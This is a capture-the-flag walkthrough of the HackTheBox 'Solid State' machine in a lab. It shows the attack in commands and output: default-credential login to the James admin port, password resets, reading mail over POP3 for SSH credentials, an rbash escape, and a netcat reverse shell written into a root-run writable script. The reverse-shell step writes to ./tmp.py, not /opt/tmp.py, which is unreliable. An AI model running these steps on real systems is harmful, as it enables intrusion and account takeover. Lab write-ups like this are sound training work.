🔓Solid State

It was originally created for HackTheBox

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

arp-scan -l                                                                                    root@j0zack
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:9c:9d:c8, IPv4: 192.168.10.25
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:46:7f:87	PCS Systemtechnik GmbH
192.168.10.28	08:00:27:d4:af:6c	PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.276 seconds (112.48 hosts/sec). 4 responded

• We find the IP of the vulnerable machine to be 192.168.10.28

2. Scanning

2.1 Nmap

• Using nmap to find the open ports and their services

nmap -Pn -A -p- 192.168.10.28                                                                  root@j0zack
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 10:02 IST
Nmap scan report for 192.168.10.28
Host is up (0.0014s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.10.25 [192.168.10.25]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 08:00:27:D4:AF:6C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.39 ms 192.168.10.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.44 seconds

• We find open ports 22, 25, 80, 110, 119, 4555 with services ssh, smtp, http, pop3 , nntp and a Apache James running respectively.

• We do not find anything interesting in the webpage

2.2 James Remote Admin

• Default credentials of James Remote Administration toll is root : root

• Logging in to the server via nc and using the default credentials.

nc 192.168.10.28 4555                                                                    1m 8s root@j0zack
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root

• We find 5 users

Welcome root. HELP for a list of commands
listusers

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

• We can use the setpassword command to reset all users passwords to 123456

setpassword mindy 123456
Password for mindy reset

2.3 POP3

• We can use telnet to log in to the pop3 servers to retrieve any useful information from the mails. (user mindy got some juicy info.)

telnet 192.168.10.28 110                                                                   30s root@j0zack
Trying 192.168.10.28...
Connected to 192.168.10.28.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

• We can log in as mindy with the password 123456 and retrieve their mail.

user mindy
+OK
pass 123456
+OK Welcome mindy

list
+OK 2 1945
1 1109
2 836

• We find 2 mails for mindy

• Getting 1st mail

retr 1

+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James

• We find out that mindy recently joined the team and this is her welcome address mail.

• Getting 2nd mail

retr 2

+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

• Here we get the ssh access credentials for mindy

mindy : P@55W0rd1!2@

3. Initial Foothold

3.1 SSH

• Using ssh to remotely log in as mindy

ssh mindy@192.168.10.28                                                                    23s root@j0zack
mindy@192.168.10.28s password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142

mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt 
914d0a4ebc1777889b5b89a23f556fd75

mindy@solidstate:~$ cd ..
-rbash: cd: restricted

• Here we find the user.txt and also notice that we are using a restricted bash (rbash) with limited commands

• In order to spawn a regular bash shell to get its full functionality, we simply use ssh again to login as mindy as well as specify bash at the end of the command.

ssh mindy@192.168.10.28 bash 

mindy@192.168.10.28s password: 
pwd
/home/mindy

• Stabilizing the shell; We find 2 users james and mindy

python -c 'import pty;pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ../
cd ../
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
ls
james  mindy

4. Privilege Escalation

4.1LinPeas

• We can use the script LinPeas to find any vulnerabilities or potential privilege escalation vectors.

• Downloading the script from its GitHub repository to /tmp directory, making it executable and running it.

mindy@solidstate:/tmp$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220417/linpeas.sh

Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 757.98K  2.52MB/s    in 0.3s    

2022-04-22 01:07:49 (2.52 MB/s) - 'linpeas.sh' saved [776167/776167]

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ chmod +x linpeas.sh

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./linpeas.sh
./linpeas.sh
 

• The script shows an interesting file /opt/tmp.py which is writable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
/var/tmp

• Viewing the file, we see that it is a script which is run by root to execute a command that removes every file and folders from the /tmp directory at regular intervals.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py

#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

• Since the file is writable, we can modify it to include a nc reverse shell ( make sure to change the IP)

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ echo 'import os; os.system("/bin/nc 192.168.10.25 1234 -e/bin/bash")' > tmp.py

• We can open up a netcat listener and after a few moments, we get a shell as root.

nc -lvnp 1234                                                                                                                                     3s
listening on [any] 1234 ...
connect to [192.168.10.25] from (UNKNOWN) [192.168.10.28] 46220

• We can stabilize the shell and get the root.txt file

python -c 'import pty;pty.spawn("/bin/bash")'

root@solidstate:~ cd /root

root@solidstate:~ ls
root.txt

root@solidstate:~ cat root.txt
b4c9723a28899b1c45db281d99cc87c9